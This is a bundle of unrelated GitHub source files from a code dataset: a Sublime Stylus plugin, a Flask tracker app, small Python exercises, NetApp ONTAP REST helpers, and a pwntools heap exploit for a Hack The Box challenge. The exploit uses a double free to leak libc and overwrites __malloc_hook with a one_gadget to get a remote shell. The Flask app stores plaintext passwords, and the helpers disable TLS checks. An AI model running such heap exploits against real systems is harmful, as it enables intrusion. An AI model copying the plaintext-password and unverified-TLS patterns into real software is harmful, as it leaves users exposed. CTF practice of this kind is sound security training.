re.match(\"^\\s+[\\w-]+\\s+[\\w-]*$\", linea):\r\n\t\t\tatributo=re.findall(\"^\\s+([\\w-]+)\\s+[\\w-]*$\", linea)[0]\r\n\t\t\treturn [(v+\"\\t•\", v) for v in ArchivoStylus.allValores(atributo)]\r\n\r\n\tdef on_pre_save(self, view):\r\n\t\tif not view.scope_name(0).startswith(\"source.stylus \"):return\r\n\t\ttexto=view.substr(sublime.Region(0, view.size()))\r\n\t\tetiquetas=re.findall(\"\\n([\\w]+)\\n\", texto)\r\n\t\tatributos=re.findall(\"\\s+([\\w-]+) ([\\w -]+)\", texto)\r\n\t\tvariables=re.findall(\"([\\w$]+)\\s*=.\", texto)\r\n\t\ta={}\r\n\t\tfor atributo in atributos:\r\n\t\t\tvalor=atributo[1]\r\n\t\t\tif valor in variables:continue\r\n\t\t\tatributo=atributo[0]\r\n\t\t\tif not a.get(atributo):a[atributo]=set()\r\n\t\t\ta[atributo].add(valor)\r\n\t\tArchivoStylus.agregar(etiquetas, a)\r\n\t\tview.run_command(\"stylus_compile\")","repo_name":"programadorsito/Packages","sub_path":"Packages/stylus/stylus.py","file_name":"stylus.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"9175726955","text":"#import libraries\nimport os\nfrom enum import unique\nfrom flask import Flask, render_template, request, url_for, redirect, session, g\nfrom flask_sqlalchemy import SQLAlchemy\nfrom matplotlib import pyplot as plt\n\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\ninstances_folder = os.path.join(basedir, 'instances')\nif not os.path.exists(instances_folder):\n os.makedirs(instances_folder)\n\n#create a Flask Instance\napp=Flask(__name__)\napp.secret_key = 'any random string '\n# Add Database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(instances_folder, 'database.sqlite3')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n#Initialize the database\ndb=SQLAlchemy(app)\n\n#create model\nclass User(db.Model):\n email_address = db.Column(db.String(100), primary_key=True, nullable=False, unique=True)\n name = db.Column(db.String(100), nullable=False)\n password = db.Column(db.String(100), nullable=False)\n\n def __init__(self, email_address, name, password):\n self.email_address = email_address\n self.name = name\n self.password = password\n\nclass Tracker(db.Model):\n Tracker_ID = db.Column(db.Integer, primary_key=True, autoincrement=True)\n Name = db.Column(db.String(100), nullable=False)\n Desc = db.Column(db.String(100), nullable=False)\n Tracker_Type = db.Column(db.String(100), nullable=False)\n Settings = db.Column(db.String(100))\n username = db.Column(db.String(100), db.ForeignKey('user.email_address'), nullable=False)\n\n def __init__(self, Name, Desc, Tracker_Type, Settings, username):\n self.Name = Name\n self.Desc = Desc\n self.Tracker_Type = Tracker_Type\n self.Settings = Settings\n self.username = username\n\nclass Log(db.Model):\n Timestamp = db.Column(db.String(100), nullable=False)\n log_ID = db.Column(db.Integer, primary_key=True, autoincrement=True)\n l_student = db.Column(db.String(100), db.ForeignKey('user.email_address'), nullable=False)\n l_Tracker_ID = db.Column(db.Integer, db.ForeignKey('tracker.Tracker_ID'), nullable=False)\n value = db.Column(db.String(100), nullable=False)\n notes = db.Column(db.String(100), nullable=False)\n\n def __init__(self, Timestamp, l_student, l_Tracker_ID, value, notes):\n self.Timestamp = Timestamp\n self.l_student = l_student\n self.l_Tracker_ID = l_Tracker_ID\n self.value = value\n self.notes = notes\n\n\n\n\n\n@app.before_request\n@app.before_request\ndef before_request():\n users = User.query.all()\n if 'user_id' in session:\n user = [x for x in users if x.email_address == session['user_id']]\n if user:\n g.user = user[0]\n else:\n g.user = None\n else:\n g.user = None\n\n\n@app.route('/')\ndef home():\n if g.user == None:\n return redirect(url_for('login'))\n else:\n return redirect(url_for('profile'))\n\n@app.route(\"/register\",methods=['GET','POST'])\ndef register():\n if request.form:\n e = request.form['email']\n n = request.form['name']\n p = request.form['pass']\n\n \n missing=User.query.filter_by(email_address=e).first()\n if missing is None:\n s=User(email_address=e, name=n, password=p)\n db.session.add(s)\n db.session.commit()\n return render_template('registration_successful.html')\n else:\n return render_template('user_already_exists.html')\n\n \n\n\n return render_template('user_registration.html')\n\n\n\n@app.route(\"/login\",methods=['GET','POST'])\ndef login():\n if request.method=='POST':\n\n session.pop('user_id', None)\n\n un = request.form['username']\n pw = request.form['password']\n\n userdata = User.query.all()\n for i in userdata:\n if i.email_address == un:\n if i.password == pw:\n session['user_id'] = un \n return redirect(url_for('profile'))\n else:\n return render_template('wrong_password.html')\n \n \n\n\n return render_template('user_not_found.html')\n return render_template('login.html')\n\n@app.route('/logout')\ndef logout():\n session.pop('user_id', None)\n return render_template('logout.html')\n\n@app.route('/profile')\ndef profile():\n if g.user == None:\n return redirect(url_for('login'))\n else:\n trackers = Tracker.query.filter_by(username = g.user.email_address)\n \n if trackers:\n return render_template('profile.html', trackers=trackers)\n else:\n return render_template('fresh_profile.html')\n\n\n@app.route('/tracker/create',methods=['GET', 'POST'])\ndef tracker_create():\n if g.user == None:\n return redirect(url_for('login'))\n else:\n if request.method =='POST':\n name=request.form['name']\n desc=request.form['desc']\n tracker_type=request.form['tracker_type']\n settings = request.form['setting']\n\n missing=Tracker.query.filter_by(Name = name , username = g.user.email_address).first()\n if missing is None:\n # If tracker not exists\n s=Tracker(Name = name,Desc=desc,Tracker_Type=tracker_type,Settings=settings,username = g.user.email_address)\n db.session.add(s)\n db.session.commit()\n return redirect(url_for('profile'))\n return render_template('tracker_exists.html')\n \n return render_template('add_tracker.html')\n\n\n\n@app.route('/tracker/')\ndef tracker_page(Tracker_ID):\n if g.user == None:\n return redirect(url_for('login'))\n else:\n logs = Log.query.with_entities(Log.Timestamp,Log.value).filter_by(l_student = g.user.email_address, l_Tracker_ID = Tracker_ID)\n x=[]\n y=[]\n for i in logs:\n print(i)\n x.append(i[0])\n y.append(i[1])\n plt.plot(x,y)\n plt.xlabel(\"Timestamp\")\n plt.ylabel(\"Value\") \n plt.savefig('static/img.png',dpi=300)\n tracker = Tracker.query.filter_by(Tracker_ID=Tracker_ID).first()\n logss = Log.query.filter_by(l_student = g.user.email_address, l_Tracker_ID = Tracker_ID)\n\n return render_template('tracker_page.html',logss = logss, tracker = tracker)\n\n@app.route('/tracker//update',methods=['GET','POST'])\ndef update_tracker(Tracker_ID):\n if g.user == None:\n return redirect(url_for('login'))\n else:\n if request.method == 'POST':\n name=request.form['name']\n desc=request.form['desc']\n tracker_type=request.form['tracker_type']\n settings = request.form['setting']\n s=Tracker.query.filter_by(Tracker_ID=Tracker_ID).update(dict(Name=name,Desc=desc,Tracker_Type=tracker_type,Settings=settings))\n db.session.commit()\n return redirect(url_for('profile'))\n elif request.method == 'GET':\n this_tracker = Tracker.query.filter_by(Tracker_ID=Tracker_ID).first()\n options = Tracker.query.with_entities(Tracker.Tracker_Type).filter_by(Tracker_ID=Tracker_ID).all()\n l=[]\n for i in options:\n if i == ('numerical',):\n l.append(1)\n else:\n l.append(2)\n print(l)\n return render_template('update_tracker.html',this_tracker = this_tracker,l = l)\n\n\n@app.route('/tracker//delete')\ndef delete_tracker(Tracker_ID):\n if g.user == None:\n return redirect(url_for('login'))\n else:\n Tracker.query.filter_by(Tracker_ID=Tracker_ID).delete()\n Log.query.filter_by(l_Tracker_ID=Tracker_ID).delete()\n db.session.commit()\n return redirect(url_for('profile'))\n\n\n\n@app.route('/add_log/',methods=['GET', 'POST'])\ndef add_log(Tracker_ID):\n tracker = Tracker.query.filter_by(Tracker_ID = Tracker_ID)\n if request.method == 'POST':\n date = request.form['date']\n value = request.form['value']\n notes = request.form['notes']\n\n s=Log(Timestamp = date,l_student = g.user.email_address,l_Tracker_ID = Tracker_ID,value = value , notes = notes)\n db.session.add(s)\n db.session.commit()\n return redirect(url_for('profile'))\n\n elif tracker[0].Tracker_Type=='numerical':\n return render_template('add_log1.html',tracker = tracker)\n else:\n values = tracker[0].Settings\n values_list = values.split(\",\")\n return render_template('add_log2.html',tracker=tracker,values_list = values_list)\n\n\nif __name__ == \"__main__\":\n database_path = os.path.join(instances_folder, 'database.sqlite3')\n if not os.path.isfile(database_path):\n with app.app_context():\n db.create_all()\n app.run()","repo_name":"ravikumawat7716/QuantifiedSelfApp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"27103310043","text":"# 큰 수의 법칙\n\n# n개의 숫자를 입력받고 m번을 더하여 가장 큰 수를 만드는 법칙\n# 특정한 인덱스가 연속하여 k개를 초과하지 않아야 한다. (k <= m)\n\nn, m, k = map(int, input().split())\ndata = list(map(int, input().split()))\n\ndata.sort() # 원본이 정렬됨.\nfirst = data[n-1] # 가장 큰수\nsecond = data[n-2] # 두번째 큰수\n\nresult = 0\n\nwhile True: # first, second 반복\n for i in range(k): # first 를 합산\n if m == 0:\n break\n result += first\n m -= 1\n if m == 0: # second 를 합산\n break\n result += second\n m -= 1\n\nprint(result)\n\n","repo_name":"sa46lll/algorithm-interview","sub_path":"algorithm/ch03/3.2.py","file_name":"3.2.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"31862527983","text":"class user:\n def __init__(self,name,mobile_no,address=\"\"):\n self.name=name\n self.mobile=mobile_no\n self.address=address\n\n\nclass BankAccount:\n def __init__(self,user_details):\n self.account_holder=user_details\n self.generate_account_no()\n self.balance=0\n \n def generate_account_no(self):\n import uuid\n self.account_no=str(uuid.uuid4())\n \n \n def deposit(self,amount):\n self.balance+=amount\n \n def withdraw(self,amount):\n if amount>self.balance:\n print(\"Insufficient amount\")\n else:\n self.balance-=amount\n \nu=user(\"anu\",\"99999999\",address=\"kurnool\")\nprint(u.name,u.mobile,u.address)\nb=BankAccount(u)\nprint(b.account_holder.name,b.account_holder.mobile,b.account_no,b.balance)\nb.deposit(100)\nprint(b.balance)\nb.deposit(1000)\nprint(b.balance)\nb.withdraw(500)\nprint(b.balance)","repo_name":"thosamanitha/python","sub_path":"python/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"20033610596","text":"from pwn import *\n\n# Overwrite main arena top chunk pointer\n\np=None\nif args.LOCAL:\n p = process('./childish_calloc', env={\"LD_PRELOAD\" : \"./libc.so.6\"})\nelse:\n p = remote('docker.hackthebox.eu', 32407)\n\ncontext.terminal = ['gnome-terminal', '-e']\nif args.GDB:\n gdb.attach(p)\n\nprm = 'Choice:'\ndef rprm():\n p.recvuntil(prm)\n\ndef rcol():\n p.recvuntil(':')\n\ndef alloc(idx, sz, data):\n rprm()\n p.sendline('1')\n rcol()\n p.sendline(str(idx))\n rcol()\n p.sendline(str(sz))\n rcol()\n p.send(data)\n\n\ndef free(idx, shell = False):\n rprm()\n p.sendline('2')\n rcol()\n p.sendline(str(idx))\n if shell:\n p.interactive()\n rcol()\n p.sendline('100')\n\ndef realloc(idx, sz,data):\n rprm()\n p.sendline('2')\n rcol()\n p.sendline(str(idx))\n rcol()\n p.sendline(str(sz))\n p.interactive()\n\n\n\ndef show(idx):\n rprm()\n p.sendline('3')\n rcol()\n p.sendline(str(idx))\n data = p.recvline().strip()\n return data\n\ndef big_alloc(sz):\n rprm()\n p.sendline('4')\n rcol()\n p.sendline(str(sz))\n\nalloc(0, 0x20, \"A\"*4)\nalloc(1, 0x20, \"B\"*4)\nalloc(2, 0x20, \"C\"*4)\nalloc(3, 0x20, \"A\"*4)\n\nfree(0)\nfree(1)\n\nbig_alloc(0x600)\n\nlibc = ELF('./libc.so.6')\noffset = 0x3ebcf0\n\nleak = u64(show(0).ljust(8, b'\\x00'))\nlog.success(hex(leak))\n\nlibc.address = leak - offset\nlog.success(hex(libc.address))\n\nfree(2)\nfree(3)\nfree(2)\n\nmalloc_hook =libc.symbols[\"__malloc_hook\"]\nfree_hook =libc.symbols[\"__free_hook\"]\ntop_chunk_ptr = leak - 0x70\n\nlog.info('malloc hook {}'.format(hex(malloc_hook)))\nlog.info(hex(free_hook))\nlog.info(hex(top_chunk_ptr))\n\n# fake chunk of\nfk_chunk = top_chunk_ptr-0x30\nlog.info(hex(fk_chunk))\n\nalloc(4, 0x20, p64(0x41)) # 2\nalloc(5, 0x20, \"X\"*4) # 3\nalloc(6, 0x20, \"Y\"*4) # 2\n\nalloc(7, 0x38, \"Z\"*4)\nalloc(8, 0x38, \"K\"*4)\nfree(7)\nfree(8)\nfree(7)\n\nalloc(9, 0x38, p64(fk_chunk))\nalloc(10, 0x38, \"A\")\nalloc(11, 0x38, \"B\")\n\nalloc(12, 0x38, p64(fk_chunk+0x10) + p64(0x41))\nalloc(13, 0x38, b\"A\"*0x30 + p64(malloc_hook-0x15))\nlog.info(\"try one gadget\")\ngadgets = [0x4f2c5, 0x4f322, 0x10a38c]\ng=libc.address + gadgets[1]\nalloc(14, 0x38, b\"A\"*5 + p64(g))\n\nrealloc(0, 0x28, \"A\"*10)\n\np.interactive()\n","repo_name":"JustBeYou/ctfs","sub_path":"htb20/pwn_childish_calloc/expl.py","file_name":"expl.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"91"}
+{"seq_id":"73674151664","text":"\"\"\"\r\nThis module is used by the other example modules in this directory. It is not\r\nmeant as a stand-alone application.\r\nCopyright (c) 2020 NetApp, Inc. All Rights Reserved.\r\nLicensed under the BSD 3-Clause \"New\" or \"Revised\" License (the \"License\");\r\nyou may not use this file except in compliance with the License.\r\nYou may obtain a copy of the License at\r\nhttps://opensource.org/licenses/BSD-3-Clause\r\n\"\"\"\r\n\r\nimport sys\r\nimport time\r\nimport base64\r\nimport argparse\r\nfrom getpass import getpass\r\nimport logging\r\nimport subprocess\r\nfrom typing import List, Union\r\nimport requests\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\n\r\nSUBSTEP_INDEX = 1\r\nSTEP_INDEX = 1\r\n\r\n\r\nclass Argument: # pylint: disable=too-few-public-methods\r\n \"\"\"A structure to hold details of an argument\"\"\"\r\n\r\n def __init__(\r\n self,\r\n short_arg: str,\r\n long_arg: str,\r\n help_string: str,\r\n default=None,\r\n required=False):\r\n self.short_arg = short_arg\r\n self.long_arg = long_arg\r\n self.help_string = help_string\r\n self.default = default\r\n self.required = required\r\n\r\n\r\ndef parse_args(\r\n program_description: str,\r\n arguments: List[Argument]) -> argparse.Namespace:\r\n \"\"\"Parse the command line arguments from the user\"\"\"\r\n\r\n parser = argparse.ArgumentParser(description=program_description)\r\n for argument in arguments:\r\n parser.add_argument(\r\n argument.short_arg, argument.long_arg, required=argument.required,\r\n help=argument.help_string, default=argument.default,\r\n )\r\n parser.add_argument(\r\n \"-u\",\r\n \"--api_user\",\r\n default=\"admin\",\r\n help=\"API Username\")\r\n parser.add_argument(\"-p\", \"--api_pass\", help=\"API Password\")\r\n parsed_args = parser.parse_args()\r\n\r\n # collect the password without echo if not already provided\r\n if not parsed_args.api_pass:\r\n parsed_args.api_pass = getpass()\r\n\r\n return parsed_args\r\n\r\n\r\ndef setup_logging() -> None:\r\n \"\"\"Configure logging for the application\"\"\"\r\n\r\n logging.basicConfig(\r\n level=logging.INFO,\r\n format=\"[%(asctime)s] [%(levelname)5s] [%(module)s:%(lineno)s] %(message)s\",\r\n )\r\n\r\n\r\ndef setup_connection(api_user: str, api_pass: str):\r\n \"\"\"Configure the default connection for the application\"\"\"\r\n\r\n base64string = base64.encodebytes(\r\n ('%s:%s' %\r\n (api_user, api_pass)).encode()).decode().replace('\\n', '')\r\n\r\n headers = {\r\n 'authorization': \"Basic %s\" % base64string,\r\n 'content-type': \"application/json\",\r\n 'accept': \"application/json\"\r\n }\r\n return headers\r\n\r\n\r\ndef get_size(vol_size: int):\r\n \"\"\" Convert MB to Bytes\"\"\"\r\n tmp = int(vol_size) * 1024 * 1024\r\n return tmp\r\n\r\n\r\ndef step(text: str) -> None:\r\n \"\"\"Print a header for this step of the script\r\n\r\n Args:\r\n text: The message that describes what this step is doing\r\n \"\"\"\r\n\r\n global SUBSTEP_INDEX, STEP_INDEX # pylint: disable=global-statement\r\n SUBSTEP_INDEX = 1\r\n\r\n logging.info(\"#\" * 80)\r\n logging.info(\"# Step %s: %s\", STEP_INDEX, text)\r\n logging.info(\"#\" * 80)\r\n STEP_INDEX += 1\r\n\r\n\r\ndef substep(text: str) -> None:\r\n \"\"\"Print a header for this substep\r\n\r\n Args:\r\n text: The message that describes what this substep is doing\r\n \"\"\"\r\n\r\n global SUBSTEP_INDEX # pylint: disable=global-statement\r\n logging.info(\"%s) %s\", SUBSTEP_INDEX, text)\r\n SUBSTEP_INDEX += 1\r\n\r\n\r\ndef run_cmd(command: Union[List[str], str]) -> None:\r\n \"\"\"Run the given command from the system.\r\n\r\n If the command is provided as a string, a shell will be invoked to parse and\r\n run the command. If it is provided as a list of strings, the command will be\r\n executed directly. See the subprocess module documentation around the use of\r\n the shell argument.\r\n\r\n Args:\r\n command: A string or a list of strings which represent the command to be\r\n run on the system shell.\r\n\r\n Raises:\r\n subprocess.CalledProcessError: This will be raised if the return code\r\n was not 0.\r\n \"\"\"\r\n\r\n if isinstance(command, list):\r\n run_in_shell = False\r\n logging.info(\">>> %s\", \" \".join(command))\r\n else:\r\n run_in_shell = True\r\n logging.info(\">>> %s\", command)\r\n result = subprocess.run(\r\n command,\r\n shell=run_in_shell,\r\n stdout=subprocess.PIPE,\r\n stderr=subprocess.PIPE,\r\n check=True,\r\n )\r\n if result.returncode != 0:\r\n logging.info(\"<<<: %s\", result.stderr.decode(\"utf-8\"))\r\n result.check_returncode()\r\n else:\r\n logging.info(\"<<< %s\", result.stdout.decode(\"utf-8\"))\r\n\r\n\r\ndef show_quotarule(cluster: str, headers_inc: str) -> None:\r\n \"\"\"Lists Quota Rule\"\"\"\r\n print()\r\n print(\"Getting Quota Rule Details\")\r\n print(\"==========================\")\r\n # https://10.195.51.149:443/api/storage/quota/rules\r\n qr_api_url = \"https://{}/api/storage/quota/rules\".format(\r\n cluster)\r\n try:\r\n response = requests.get(qr_api_url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(str(err))\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(str(err))\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n\r\n qrdict = dict(response.json())\r\n quotas = qrdict['records']\r\n print(\" List of LUNs :- \")\r\n for quota in quotas:\r\n print(\"=====\")\r\n print(\"Quota Volume Name = %s\" % quota['volume']['name'])\r\n print(\"Quota UUID = %s\" % quota['uuid'])\r\n\r\n\r\ndef show_interface(cluster: str, headers_inc: str):\r\n \"\"\" List Interface\"\"\"\r\n print(\"\\n List of Interface:- \\n\")\r\n int_api_url = \"https://{}/api/network/ip/interfaces\".format(\r\n cluster)\r\n try:\r\n response = requests.get(int_api_url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(str(err))\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(str(err))\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n\r\n intdict = dict(response.json())\r\n inters = intdict['records']\r\n print()\r\n print(\" List of Interfaces :- \")\r\n for inter in inters:\r\n print(\"=====\")\r\n print(\"Interface Name = %s\" % inter['name'])\r\n print(\"Interface UUID = %s\" % inter['uuid'])\r\n\r\n\r\ndef show_disk(cluster: str, headers_inc: str):\r\n \"\"\"List the Disk\"\"\"\r\n url = \"https://{}/api//storage/disks\".format(cluster)\r\n try:\r\n response = requests.get(url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(err)\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(err)\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n tmp = dict(response.json())\r\n disks = tmp['records']\r\n print()\r\n print(\" List of Disks:- \")\r\n print(\"================\")\r\n for disk in disks:\r\n print(\"Disk Name :- %s\" % disk['name'])\r\n\r\n\r\ndef show_node(cluster: str, headers_inc: str):\r\n \"\"\"List the nodes\"\"\"\r\n url = \"https://{}/api/cluster/nodes\".format(cluster)\r\n try:\r\n response = requests.get(url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(err)\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(err)\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n tmp = dict(response.json())\r\n nodes = tmp['records']\r\n print()\r\n print(\" List of Nodes:- \")\r\n print(\"================\")\r\n for node in nodes:\r\n print(\"Node Name :- %s\" % node['name'])\r\n print(\"Node UUID :- %s\" % node['uuid'])\r\n\r\n\r\ndef get_key_igroup(\r\n svm_name: str,\r\n initiator_name: str,\r\n cluster: str,\r\n headers_inc: str):\r\n \"\"\"Get UUID of the Initiator\"\"\"\r\n # https://10.195.51.149:443 \"GET\r\n # /api/protocols/san/igroups?svm.name=smog1&name=gt1\r\n url = \"https://{}/api/protocols/san/igroups?svm.name={}&name={}\".format(\r\n cluster, svm_name, initiator_name)\r\n\r\n try:\r\n response = requests.get(url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(str(err))\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(str(err))\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n\r\n initdict = dict(response.json())\r\n inits = initdict['records']\r\n print()\r\n print(\" UUID of Initiator Group :- \")\r\n for init in inits:\r\n print(\"Initiator Name = %s\" % init['name'])\r\n print(\"Initiator UUID = %s\" % init['uuid'])\r\n return (init['uuid'])\r\n\r\n\r\ndef show_igroup(svm_name: str, cluster: str, headers_inc: str) -> None:\r\n \"\"\"Lists Igroup\"\"\"\r\n\r\n print(\"Getting Initiator Group Details\")\r\n print(\"===============================\")\r\n\r\n url = \"https://{}/api/protocols/san/igroups?svm.name={}&fields=uuid\".format(\r\n cluster, svm_name)\r\n\r\n try:\r\n response = requests.get(url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(str(err))\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(str(err))\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n\r\n initdict = dict(response.json())\r\n inits = initdict['records']\r\n print()\r\n print(\" List of Initiator Group :- \")\r\n print()\r\n for init in inits:\r\n print(\"=====\")\r\n print(\"Initiator Name = %s\" % init['name'])\r\n print(\"Initiator UUID = %s\" % init['uuid'])\r\n\r\n\r\ndef show_lun(cluster: str, headers_inc: str) -> None:\r\n \"\"\"Lists Accounts\"\"\"\r\n print(\"======================\")\r\n print()\r\n lun_api_url = \"https://{}/api/storage/luns\".format(\r\n cluster)\r\n try:\r\n response = requests.get(lun_api_url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(str(err))\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(str(err))\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n\r\n lundict = dict(response.json())\r\n luns = lundict['records']\r\n print()\r\n print(\" List of LUNs :- \")\r\n for lun in luns:\r\n print(\"=====\")\r\n print(\"LUN Name = %s\" % lun['name'])\r\n print(\"LUN UUID = %s\" % lun['uuid'])\r\n\r\n\r\ndef get_key_lun(lun_name: str, cluster: str, headers_inc: str) -> None:\r\n \"\"\"Lists LUN\"\"\"\r\n print(\"======================\")\r\n print()\r\n lun_api_url = \"https://{}/api/storage/luns?name={}\".format(\r\n cluster, lun_name)\r\n try:\r\n response = requests.get(lun_api_url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(str(err))\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(str(err))\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n\r\n lundict = dict(response.json())\r\n luns = lundict['records']\r\n print()\r\n print(\" List of LUNs :- \")\r\n for lun in luns:\r\n print(lun['uuid'])\r\n return lun['uuid']\r\n\r\n\r\ndef get_key_snapshot(\r\n svm_name: str,\r\n volume_name: str,\r\n snapshot_name: str,\r\n cluster: str,\r\n headers_inc: str):\r\n \"\"\" Get Snapshot Key\"\"\"\r\n vol_uuid = get_key_volumes(svm_name, volume_name, cluster, headers_inc)\r\n snap_api_url = \"https://{}/api/storage/volumes/{}/snapshots\".format(\r\n cluster, vol_uuid)\r\n try:\r\n job_response = requests.get(\r\n snap_api_url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(err)\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(err)\r\n sys.exit(1)\r\n url_text = job_response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n snapshotsdict = dict(job_response.json())\r\n snapshots = snapshotsdict['records']\r\n print()\r\n print(\"The UUID of the Snapshot is \")\r\n for snapshot in snapshots:\r\n if snapshot['name'] == snapshot_name:\r\n print(snapshot['uuid'])\r\n return snapshot['uuid']\r\n\r\n\r\ndef get_key_volumes(\r\n svm_name: str,\r\n volume_name: str,\r\n cluster: str,\r\n headers_inc: str):\r\n \"\"\" get volume keys\"\"\"\r\n print()\r\n url = \"https://{}/api/storage/volumes?name={}&svm.name={}\".format(\r\n cluster, volume_name, svm_name)\r\n try:\r\n response = requests.get(url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(err)\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(err)\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n respdict = dict(response.json())\r\n volumes = respdict['records']\r\n print(\"The UUID of the Volume is \")\r\n for volume in volumes:\r\n print(volume['uuid'])\r\n return volume['uuid']\r\n\r\n\r\ndef get_key_accountowner(account_name: str, cluster: str, headers_inc: str):\r\n print(\"======================\")\r\n print()\r\n account_api_url = \"https://{}/api/security/accounts?name={}\".format(\r\n cluster, account_name)\r\n try:\r\n response = requests.get(\r\n account_api_url,\r\n headers=headers_inc,\r\n verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(str(err))\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(str(err))\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n accountdict = dict(response.json())\r\n accounts = accountdict['records']\r\n print()\r\n print(\"Account UUID :- \")\r\n for account in accounts:\r\n print(account['owner']['uuid'])\r\n return account['owner']['uuid']\r\n\r\n\r\ndef show_account(cluster: str, headers_inc: str):\r\n \"\"\"Lists Accounts\"\"\"\r\n print(\"======================\")\r\n print()\r\n account_api_url = \" https://{}/api/security/accounts\".format(\r\n cluster)\r\n try:\r\n response = requests.get(\r\n account_api_url,\r\n headers=headers_inc,\r\n verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(str(err))\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(str(err))\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n\r\n accountdict = dict(response.json())\r\n accounts = accountdict['records']\r\n print()\r\n print(\" List of Accounts :- \")\r\n for account in accounts:\r\n print(\"=====\")\r\n print(\"Account Name = %s\" % account['name'])\r\n print(\"Account Owner Name = %s\" % account['owner']['name'])\r\n print(\"Account Owner UUID = %s\" % account['owner']['uuid'])\r\n\r\n\r\ndef get_key_svms(svm_name: str, cluster: str, headers_inc: str):\r\n \"\"\" get svm key\"\"\"\r\n url = \"https://{}/api/svm/svms\".format(cluster)\r\n try:\r\n response = requests.get(url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(err)\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(err)\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n\r\n svmsdict = dict(response.json())\r\n svms = svmsdict['records']\r\n print(\"The UUID of the SVM is \")\r\n for svm in svms:\r\n if (svm['name']) == svm_name:\r\n print(svm['uuid'])\r\n return svm['uuid']\r\n\r\n\r\ndef show_svm(cluster: str, headers_inc: str):\r\n \"\"\" List the svm\"\"\"\r\n url = \"https://{}/api/svm/svms\".format(cluster)\r\n try:\r\n response = requests.get(url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(err)\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(err)\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n tmp = dict(response.json())\r\n svms = tmp['records']\r\n print()\r\n print(\" List of SVMs:- \")\r\n print(\"================\")\r\n for i in svms:\r\n print(i['name'])\r\n return response.json()\r\n\r\n\r\ndef show_volume(cluster: str, headers_inc: str, svm_name: str):\r\n \"\"\" list the volumes\"\"\"\r\n print()\r\n print(\"Getting Volume Details\")\r\n print(\"======================\")\r\n url = \"https://{}/api/storage/volumes/?svm.name={}\".format(\r\n cluster, 